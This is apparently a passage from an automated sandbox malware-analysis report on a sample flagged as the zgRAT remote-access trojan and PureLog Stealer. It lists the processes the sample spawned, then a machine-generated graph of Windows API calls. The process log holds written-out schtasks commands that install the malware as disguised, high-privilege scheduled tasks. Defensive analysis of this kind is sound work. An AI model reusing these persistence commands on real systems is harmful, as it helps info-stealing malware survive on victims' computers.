                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:16
                                                          Start time:07:18:28
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:17
                                                          Start time:07:18:28
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:18
                                                          Start time:07:18:28
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyFn" /sc MINUTE /mo 10 /tr "'C:\Users\user\Saved Games\nGnJvqnFLoRdIZNyVoMyF.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:19
                                                          Start time:07:18:28
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyF" /sc ONLOGON /tr "'C:\Users\user\Saved Games\nGnJvqnFLoRdIZNyVoMyF.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:20
                                                          Start time:07:18:28
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyFn" /sc MINUTE /mo 8 /tr "'C:\Users\user\Saved Games\nGnJvqnFLoRdIZNyVoMyF.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:21
                                                          Start time:07:18:28
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyFn" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:22
                                                          Start time:07:18:28
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyF" /sc ONLOGON /tr "'C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:23
                                                          Start time:07:18:29
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyFn" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:26
                                                          Start time:07:18:29
                                                          Start date:30/12/2024
                                                          Path:C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe"
                                                          Imagebase:0x800000
                                                          File size:3'861'504 bytes
                                                          MD5 hash:798B5560B2A2C6596A0C1A09419AD2C4
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Has exited:true

                                                          Target ID:27
                                                          Start time:07:18:29
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qVPGMYvCwM.bat"
                                                          Imagebase:0x7ff7cf580000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:28
                                                          Start time:07:18:29
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:29
                                                          Start time:07:18:29
                                                          Start date:30/12/2024
                                                          Path:C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe"
                                                          Imagebase:0xd00000
                                                          File size:3'861'504 bytes
                                                          MD5 hash:798B5560B2A2C6596A0C1A09419AD2C4
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:32
                                                          Start time:07:18:29
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\chcp.com
                                                          Wow64 process (32bit):false
                                                          Commandline:chcp 65001
                                                          Imagebase:0x7ff70f330000
                                                          File size:14'848 bytes
                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:33
                                                          Start time:07:18:29
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\PING.EXE
                                                          Wow64 process (32bit):false
                                                          Commandline:ping -n 10 localhost
                                                          Imagebase:0x7ff618140000
                                                          File size:22'528 bytes
                                                          MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:36
                                                          Start time:07:18:38
                                                          Start date:30/12/2024
                                                          Path:C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe"
                                                          Imagebase:0xcc0000
                                                          File size:3'861'504 bytes
                                                          MD5 hash:798B5560B2A2C6596A0C1A09419AD2C4
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:9.5%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:9.3%
                                                            Total number of Nodes:1505
                                                            Total number of Limit Nodes:45
                                                            execution_graph 25323 50e455 14 API calls ___delayLoadHelper2@8 23454 50cd58 23455 50ce22 23454->23455 23461 50cd7b _wcschr 23454->23461 23464 50c793 _wcslen _wcsrchr 23455->23464 23482 50d78f 23455->23482 23458 50d40a 23459 501fbb CompareStringW 23459->23461 23461->23455 23461->23459 23462 50ca67 SetWindowTextW 23462->23464 23464->23458 23464->23462 23468 50c855 SetFileAttributesW 23464->23468 23473 50cc31 GetDlgItem SetWindowTextW SendMessageW 23464->23473 23476 50cc71 SendMessageW 23464->23476 23481 501fbb CompareStringW 23464->23481 23504 50b314 23464->23504 23508 50a64d GetCurrentDirectoryW 23464->23508 23513 4fa5d1 6 API calls 23464->23513 23514 4fa55a FindClose 23464->23514 23515 50b48e 76 API calls 2 library calls 23464->23515 23516 513e3e 23464->23516 23469 50c90f GetFileAttributesW 23468->23469 23480 50c86f _abort _wcslen 23468->23480 23469->23464 23472 50c921 DeleteFileW 23469->23472 23472->23464 23474 50c932 23472->23474 23473->23464 23510 4f4092 23474->23510 23476->23464 23478 50c967 MoveFileW 23478->23464 23479 50c97f MoveFileExW 23478->23479 23479->23464 23480->23464 23480->23469 23509 4fb991 51 API calls 3 library calls 23480->23509 23481->23464 23485 50d799 _abort _wcslen 23482->23485 23483 50d9c0 23487 50d9e7 23483->23487 23490 50d9de ShowWindow 23483->23490 23484 50d8a5 23529 4fa231 23484->23529 23485->23483 23485->23484 23485->23487 23532 501fbb CompareStringW 23485->23532 23487->23464 23490->23487 23492 50d925 23534 50dc3b 6 API calls 23492->23534 23493 50d97b CloseHandle 23495 50d994 23493->23495 23496 50d989 23493->23496 23494 50d8d1 23494->23487 23494->23492 23494->23493 23497 50d91b ShowWindow 23494->23497 23495->23483 23535 501fbb CompareStringW 23496->23535 23497->23492 23500 50d93d 23500->23493 23501 50d950 GetExitCodeProcess 23500->23501 23501->23493 23502 50d963 23501->23502 23502->23493 23506 50b31e 23504->23506 23505 50b40d 23505->23464 23506->23505 23507 50b3f0 ExpandEnvironmentStringsW 23506->23507 23507->23505 23508->23464 23509->23480 23550 4f4065 23510->23550 23513->23464 23514->23464 23515->23464 23517 518e54 23516->23517 23518 518e61 23517->23518 23519 518e6c 23517->23519 23637 518e06 23518->23637 23520 518e74 23519->23520 23527 518e7d _abort 23519->23527 23522 518dcc _free 20 API calls 23520->23522 23525 518e69 23522->23525 23523 518e82 23644 5191a8 20 API calls _abort 23523->23644 23524 518ea7 HeapReAlloc 23524->23525 23524->23527 23525->23464 23527->23523 23527->23524 23645 517a5e 7 API calls 2 library calls 23527->23645 23536 4fa243 23529->23536 23532->23484 23533 4fb6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 23533->23494 23534->23500 23535->23495 23544 50ec50 23536->23544 23539 4fa23a 23539->23494 23539->23533 23540 4fa261 23546 4fbb03 23540->23546 23542 4fa275 23542->23539 23543 4fa279 GetFileAttributesW 23542->23543 23543->23539 23545 4fa250 GetFileAttributesW 23544->23545 23545->23539 23545->23540 23547 4fbb10 _wcslen 23546->23547 23548 4fbbb8 GetCurrentDirectoryW 23547->23548 23549 4fbb39 _wcslen 23547->23549 23548->23549 23549->23542 23551 4f407c __vswprintf_c_l 23550->23551 23554 515fd4 23551->23554 23557 514097 23554->23557 23558 5140d7 23557->23558 23559 5140bf 23557->23559 23558->23559 23561 5140df 23558->23561 23574 5191a8 20 API calls _abort 23559->23574 23576 514636 23561->23576 23562 5140c4 23575 519087 26 API calls _abort 23562->23575 23566 5140cf 23587 50fbbc 23566->23587 23569 4f4086 GetFileAttributesW 23569->23474 23569->23478 23570 514167 23585 5149e6 51 API calls 3 library calls 23570->23585 23573 514172 23586 5146b9 20 API calls _free 23573->23586 23574->23562 23575->23566 23577 514653 23576->23577 23578 5140ef 23576->23578 23577->23578 23594 5197e5 GetLastError 23577->23594 23584 514601 20 API calls 2 library calls 23578->23584 23580 514674 23614 51993a 38 API calls __cftof 23580->23614 23582 51468d 23615 519967 38 API calls __cftof 23582->23615 23584->23570 23585->23573 23586->23566 23588 50fbc4 23587->23588 23589 50fbc5 IsProcessorFeaturePresent 23587->23589 23588->23569 23591 50fc07 23589->23591 23636 50fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23591->23636 23593 50fcea 23593->23569 23595 5197fb 23594->23595 23598 519801 23594->23598 23616 51ae5b 11 API calls 2 library calls 23595->23616 23600 519850 SetLastError 23598->23600 23617 51b136 23598->23617 23600->23580 23601 51981b 23624 518dcc 23601->23624 23603 519830 23603->23601 23606 519837 23603->23606 23605 519821 23607 51985c SetLastError 23605->23607 23631 519649 20 API calls _abort 23606->23631 23632 518d24 38 API calls _abort 23607->23632 23609 519842 23611 518dcc _free 20 API calls 23609->23611 23613 519849 23611->23613 23613->23600 23613->23607 23614->23582 23615->23578 23616->23598 23622 51b143 _abort 23617->23622 23618 51b183 23634 5191a8 20 API calls _abort 23618->23634 23619 51b16e RtlAllocateHeap 23621 519813 23619->23621 23619->23622 23621->23601 23630 51aeb1 11 API calls 2 library calls 23621->23630 23622->23618 23622->23619 23633 517a5e 7 API calls 2 library calls 23622->23633 23625 518dd7 RtlFreeHeap 23624->23625 23629 518e00 _free 23624->23629 23626 518dec 23625->23626 23625->23629 23635 5191a8 20 API calls _abort 23626->23635 23628 518df2 GetLastError 23628->23629 23629->23605 23630->23603 23631->23609 23633->23622 23634->23621 23635->23628 23636->23593 23638 518e44 23637->23638 23642 518e14 _abort 23637->23642 23647 5191a8 20 API calls _abort 23638->23647 23640 518e2f RtlAllocateHeap 23641 518e42 23640->23641 23640->23642 23641->23525 23642->23638 23642->23640 23646 517a5e 7 API calls 2 library calls 23642->23646 23644->23525 23645->23527 23646->23642 23647->23641 25325 50a440 GdipCloneImage GdipAlloc 25386 513a40 5 API calls CatchGuardHandler 25400 521f40 CloseHandle 23724 50e44b 23726 50e3f4 23724->23726 23725 50e85d ___delayLoadHelper2@8 14 API calls 23725->23726 23726->23724 23726->23725 25326 50a070 10 API calls 25387 50b270 99 API calls 24652 4f9f7a 24653 4f9f8f 24652->24653 24654 4f9f88 24652->24654 24655 4f9f9c GetStdHandle 24653->24655 24662 4f9fab 24653->24662 24655->24662 24656 4fa003 WriteFile 24656->24662 24657 4f9fcf 24658 4f9fd4 WriteFile 24657->24658 24657->24662 24658->24657 24658->24662 24660 4fa095 24664 4f6e98 77 API calls 24660->24664 24662->24654 24662->24656 24662->24657 24662->24658 24662->24660 24663 4f6baa 78 API calls 24662->24663 24663->24662 24664->24654 24669 50e569 24671 50e517 24669->24671 24670 50e85d ___delayLoadHelper2@8 14 API calls 24670->24671 24671->24670 25388 518268 55 API calls _free 25329 50c793 107 API calls 5 library calls 25330 4f1075 84 API calls 24672 4f9a74 24675 4f9a7e 24672->24675 24673 4f9b9d SetFilePointer 24674 4f9bb6 GetLastError 24673->24674 24678 4f9ab1 24673->24678 24674->24678 24675->24673 24676 4f981a 79 API calls 24675->24676 24677 4f9b79 24675->24677 24675->24678 24676->24677 24677->24673 25403 4f1f72 128 API calls __EH_prolog 25404 517f6e 52 API calls 2 library calls 25363 50ad10 73 API calls 25333 50a400 GdipDisposeImage GdipFree 25389 50d600 70 API calls 25334 516000 QueryPerformanceFrequency QueryPerformanceCounter 25367 512900 6 API calls 4 library calls 25390 51f200 51 API calls 25406 51a700 21 API calls 25407 4f1710 86 API calls 25369 50f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25408 50ff30 LocalFree 24698 51bb30 24699 51bb39 24698->24699 24700 51bb42 24698->24700 24702 51ba27 24699->24702 24703 5197e5 _abort 38 API calls 24702->24703 24704 51ba34 24703->24704 24722 51bb4e 24704->24722 24706 51ba3c 24731 51b7bb 24706->24731 24709 518e06 __vswprintf_c_l 21 API calls 24710 51ba64 24709->24710 24712 51ba96 24710->24712 24738 51bbf0 24710->24738 24714 518dcc _free 20 API calls 24712->24714 24716 51ba53 24714->24716 24715 51ba91 24748 5191a8 20 API calls _abort 24715->24748 24716->24700 24718 51bada 24718->24712 24749 51b691 26 API calls 24718->24749 24719 51baae 24719->24718 24720 518dcc _free 20 API calls 24719->24720 24720->24718 24723 51bb5a ___scrt_is_nonwritable_in_current_image 24722->24723 24724 5197e5 _abort 38 API calls 24723->24724 24729 51bb64 24724->24729 24726 51bbe8 _abort 24726->24706 24729->24726 24730 518dcc _free 20 API calls 24729->24730 24750 518d24 38 API calls _abort 24729->24750 24751 51ac31 EnterCriticalSection 24729->24751 24752 51bbdf LeaveCriticalSection _abort 24729->24752 24730->24729 24732 514636 __cftof 38 API calls 24731->24732 24733 51b7cd 24732->24733 24734 51b7dc GetOEMCP 24733->24734 24735 51b7ee 24733->24735 24736 51b805 24734->24736 24735->24736 24737 51b7f3 GetACP 24735->24737 24736->24709 24736->24716 24737->24736 24739 51b7bb 40 API calls 24738->24739 24740 51bc0f 24739->24740 24742 51bc60 IsValidCodePage 24740->24742 24745 51bc16 24740->24745 24747 51bc85 _abort 24740->24747 24741 50fbbc CatchGuardHandler 5 API calls 24743 51ba89 24741->24743 24744 51bc72 GetCPInfo 24742->24744 24742->24745 24743->24715 24743->24719 24744->24745 24744->24747 24745->24741 24753 51b893 GetCPInfo 24747->24753 24748->24712 24749->24712 24751->24729 24752->24729 24754 51b977 24753->24754 24760 51b8cd 24753->24760 24757 50fbbc CatchGuardHandler 5 API calls 24754->24757 24759 51ba23 24757->24759 24759->24745 24763 51c988 24760->24763 24762 51ab78 __vswprintf_c_l 43 API calls 24762->24754 24764 514636 __cftof 38 API calls 24763->24764 24765 51c9a8 MultiByteToWideChar 24764->24765 24767 51c9e6 24765->24767 24775 51ca7e 24765->24775 24770 518e06 __vswprintf_c_l 21 API calls 24767->24770 24773 51ca07 _abort __vsnwprintf_l 24767->24773 24768 50fbbc CatchGuardHandler 5 API calls 24771 51b92e 24768->24771 24769 51ca78 24782 51abc3 20 API calls _free 24769->24782 24770->24773 24777 51ab78 24771->24777 24773->24769 24774 51ca4c MultiByteToWideChar 24773->24774 24774->24769 24776 51ca68 GetStringTypeW 24774->24776 24775->24768 24776->24769 24778 514636 __cftof 38 API calls 24777->24778 24779 51ab8b 24778->24779 24783 51a95b 24779->24783 24782->24775 24784 51a976 __vswprintf_c_l 24783->24784 24785 51a99c MultiByteToWideChar 24784->24785 24786 51ab50 24785->24786 24787 51a9c6 24785->24787 24788 50fbbc CatchGuardHandler 5 API calls 24786->24788 24790 518e06 __vswprintf_c_l 21 API calls 24787->24790 24793 51a9e7 __vsnwprintf_l 24787->24793 24789 51ab63 24788->24789 24789->24762 24790->24793 24791 51aa30 MultiByteToWideChar 24792 51aa9c 24791->24792 24794 51aa49 24791->24794 24819 51abc3 20 API calls _free 24792->24819 24793->24791 24793->24792 24810 51af6c 24794->24810 24798 51aa73 24798->24792 24800 51af6c __vswprintf_c_l 11 API calls 24798->24800 24799 51aaab 24802 518e06 __vswprintf_c_l 21 API calls 24799->24802 24805 51aacc __vsnwprintf_l 24799->24805 24800->24792 24801 51ab41 24818 51abc3 20 API calls _free 24801->24818 24802->24805 24803 51af6c __vswprintf_c_l 11 API calls 24806 51ab20 24803->24806 24805->24801 24805->24803 24806->24801 24807 51ab2f WideCharToMultiByte 24806->24807 24807->24801 24808 51ab6f 24807->24808 24820 51abc3 20 API calls _free 24808->24820 24811 51ac98 _abort 5 API calls 24810->24811 24812 51af93 24811->24812 24815 51af9c 24812->24815 24821 51aff4 10 API calls 3 library calls 24812->24821 24814 51afdc LCMapStringW 24814->24815 24816 50fbbc CatchGuardHandler 5 API calls 24815->24816 24817 51aa60 24816->24817 24817->24792 24817->24798 24817->24799 24818->24792 24819->24786 24820->24792 24821->24814 25337 51c030 GetProcessHeap 25338 4f1025 29 API calls 25339 51f421 21 API calls __vswprintf_c_l 25391 50c220 93 API calls _swprintf 25370 51b4ae 27 API calls CatchGuardHandler 23394 50e1d1 14 API calls ___delayLoadHelper2@8 25411 51a3d0 21 API calls 2 library calls 25412 522bd0 VariantClear 25342 50f4d3 20 API calls 23396 50e2d7 23398 50e1db 23396->23398 23399 50e85d 23398->23399 23425 50e5bb 23399->23425 23401 50e86d 23402 50e8ca 23401->23402 23411 50e8ee 23401->23411 23403 50e7fb DloadReleaseSectionWriteAccess 6 API calls 23402->23403 23404 50e8d5 RaiseException 23403->23404 23419 50eac3 23404->23419 23405 50e9d9 23409 50ea95 23405->23409 23410 50ea37 GetProcAddress 23405->23410 23406 50e966 LoadLibraryExA 23407 50e9c7 23406->23407 23408 50e979 GetLastError 23406->23408 23407->23405 23412 50e9d2 FreeLibrary 23407->23412 23413 50e9a2 23408->23413 23418 50e98c 23408->23418 23434 50e7fb 23409->23434 23410->23409 23415 50ea47 GetLastError 23410->23415 23411->23405 23411->23406 23411->23407 23411->23409 23412->23405 23414 50e7fb DloadReleaseSectionWriteAccess 6 API calls 23413->23414 23416 50e9ad RaiseException 23414->23416 23421 50ea5a 23415->23421 23416->23419 23418->23407 23418->23413 23419->23398 23420 50e7fb DloadReleaseSectionWriteAccess 6 API calls 23422 50ea7b RaiseException 23420->23422 23421->23409 23421->23420 23423 50e5bb ___delayLoadHelper2@8 6 API calls 23422->23423 23424 50ea92 23423->23424 23424->23409 23426 50e5c7 23425->23426 23427 50e5ed 23425->23427 23442 50e664 23426->23442 23427->23401 23429 50e5cc 23431 50e5e8 23429->23431 23445 50e78d 23429->23445 23450 50e5ee GetModuleHandleW GetProcAddress GetProcAddress 23431->23450 23433 50e836 23433->23401 23435 50e80d 23434->23435 23436 50e82f 23434->23436 23437 50e664 DloadReleaseSectionWriteAccess 3 API calls 23435->23437 23436->23419 23438 50e812 23437->23438 23439 50e82a 23438->23439 23440 50e78d DloadProtectSection 3 API calls 23438->23440 23453 50e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23439->23453 23440->23439 23451 50e5ee GetModuleHandleW GetProcAddress GetProcAddress 23442->23451 23444 50e669 23444->23429 23446 50e7a2 DloadProtectSection 23445->23446 23447 50e7a8 23446->23447 23448 50e7dd VirtualProtect 23446->23448 23452 50e6a3 VirtualQuery GetSystemInfo 23446->23452 23447->23431 23448->23447 23450->23433 23451->23444 23452->23448 23453->23436 25393 510ada 51 API calls 2 library calls 25372 50b5c0 100 API calls 25413 5077c0 118 API calls 25414 50ffc0 RaiseException _com_error::_com_error CallUnexpected 23651 50dec2 23652 50decf 23651->23652 23659 4fe617 23652->23659 23655 4f4092 _swprintf 51 API calls 23656 50def1 SetDlgItemTextW 23655->23656 23663 50b568 PeekMessageW 23656->23663 23660 4fe627 23659->23660 23668 4fe648 23660->23668 23664 50b583 GetMessageW 23663->23664 23665 50b5bc 23663->23665 23666 50b5a8 TranslateMessage DispatchMessageW 23664->23666 23667 50b599 IsDialogMessageW 23664->23667 23666->23665 23667->23665 23667->23666 23674 4fd9b0 23668->23674 23671 4fe66b LoadStringW 23672 4fe645 23671->23672 23673 4fe682 LoadStringW 23671->23673 23672->23655 23673->23672 23679 4fd8ec 23674->23679 23676 4fd9cd 23677 4fd9e2 23676->23677 23687 4fd9f0 26 API calls 23676->23687 23677->23671 23677->23672 23680 4fd904 23679->23680 23686 4fd984 _strncpy 23679->23686 23682 4fd928 23680->23682 23688 501da7 WideCharToMultiByte 23680->23688 23685 4fd959 23682->23685 23689 4fe5b1 50 API calls __vsnprintf 23682->23689 23690 516159 26 API calls 3 library calls 23685->23690 23686->23676 23687->23677 23688->23682 23689->23685 23690->23686 23695 4f10d5 23700 4f5abd 23695->23700 23701 4f5ac7 __EH_prolog 23700->23701 23707 4fb505 23701->23707 23703 4f5ad3 23713 4f5cac GetCurrentProcess GetProcessAffinityMask 23703->23713 23708 4fb50f __EH_prolog 23707->23708 23714 4ff1d0 82 API calls 23708->23714 23710 4fb521 23715 4fb61e 23710->23715 23714->23710 23716 4fb630 _abort 23715->23716 23719 5010dc 23716->23719 23722 50109e GetCurrentProcess GetProcessAffinityMask 23719->23722 23723 4fb597 23722->23723 23723->23703 25394 5062ca 123 API calls __InternalCxxFrameHandler 23728 5198f0 23736 51adaf 23728->23736 23732 51990c 23733 519919 23732->23733 23744 519920 11 API calls 23732->23744 23735 519904 23745 51ac98 23736->23745 23739 51addf 23741 50fbbc CatchGuardHandler 5 API calls 23739->23741 23740 51adee TlsAlloc 23740->23739 23742 5198fa 23741->23742 23742->23735 23743 519869 20 API calls 2 library calls 23742->23743 23743->23732 23744->23735 23746 51acc8 23745->23746 23750 51acc4 23745->23750 23746->23739 23746->23740 23747 51ace8 23747->23746 23749 51acf4 GetProcAddress 23747->23749 23751 51ad04 _abort 23749->23751 23750->23746 23750->23747 23752 51ad34 23750->23752 23751->23746 23753 51ad55 LoadLibraryExW 23752->23753 23754 51ad4a 23752->23754 23755 51ad72 GetLastError 23753->23755 23756 51ad8a 23753->23756 23754->23750 23755->23756 23757 51ad7d LoadLibraryExW 23755->23757 23756->23754 23758 51ada1 FreeLibrary 23756->23758 23757->23756 23758->23754 23759 51abf0 23762 51abfb 23759->23762 23761 51ac24 23772 51ac50 DeleteCriticalSection 23761->23772 23762->23761 23763 51ac20 23762->23763 23765 51af0a 23762->23765 23766 51ac98 _abort 5 API calls 23765->23766 23767 51af31 23766->23767 23768 51af4f InitializeCriticalSectionAndSpinCount 23767->23768 23769 51af3a 23767->23769 23768->23769 23770 50fbbc CatchGuardHandler 5 API calls 23769->23770 23771 51af66 23770->23771 23771->23762 23772->23763 25344 5188f0 7 API calls ___scrt_uninitialize_crt 25374 50fd4f 9 API calls 2 library calls 25375 4ff1e8 FreeLibrary 25345 512cfb 38 API calls 4 library calls 23776 4f13e1 84 API calls 2 library calls 23777 50b7e0 23778 50b7ea __EH_prolog 23777->23778 23943 4f1316 23778->23943 23781 50b841 23782 50b82a 23782->23781 23785 50b838 23782->23785 23786 50b89b 23782->23786 23783 50bf0f 24015 50d69e 23783->24015 23788 50b878 23785->23788 23789 50b83c 23785->23789 23792 50b92e GetDlgItemTextW 23786->23792 23796 50b8b1 23786->23796 23788->23781 23800 50b95f KiUserCallbackDispatcher 23788->23800 23789->23781 23798 4fe617 53 API calls 23789->23798 23790 50bf38 23793 50bf41 SendDlgItemMessageW 23790->23793 23794 50bf52 GetDlgItem SendMessageW 23790->23794 23791 50bf2a SendMessageW 23791->23790 23792->23788 23795 50b96b 23792->23795 23793->23794 24033 50a64d GetCurrentDirectoryW 23794->24033 23801 50b980 GetDlgItem 23795->23801 23941 50b974 23795->23941 23797 4fe617 53 API calls 23796->23797 23804 50b8ce SetDlgItemTextW 23797->23804 23805 50b85b 23798->23805 23800->23781 23802 50b994 SendMessageW SendMessageW 23801->23802 23803 50b9b7 SetFocus 23801->23803 23802->23803 23807 50b9c7 23803->23807 23823 50b9e0 23803->23823 23808 50b8d9 23804->23808 24055 4f124f SHGetMalloc 23805->24055 23806 50bf82 GetDlgItem 23810 50bfa5 SetWindowTextW 23806->23810 23811 50bf9f 23806->23811 23812 4fe617 53 API calls 23807->23812 23808->23781 23816 50b8e6 GetMessageW 23808->23816 24034 50abab GetClassNameW 23810->24034 23811->23810 23817 50b9d1 23812->23817 23813 50b862 23813->23781 23824 50c1fc SetDlgItemTextW 23813->23824 23814 50be55 23818 4fe617 53 API calls 23814->23818 23816->23781 23821 50b8fd IsDialogMessageW 23816->23821 24056 50d4d4 23817->24056 23825 50be65 SetDlgItemTextW 23818->23825 23821->23808 23827 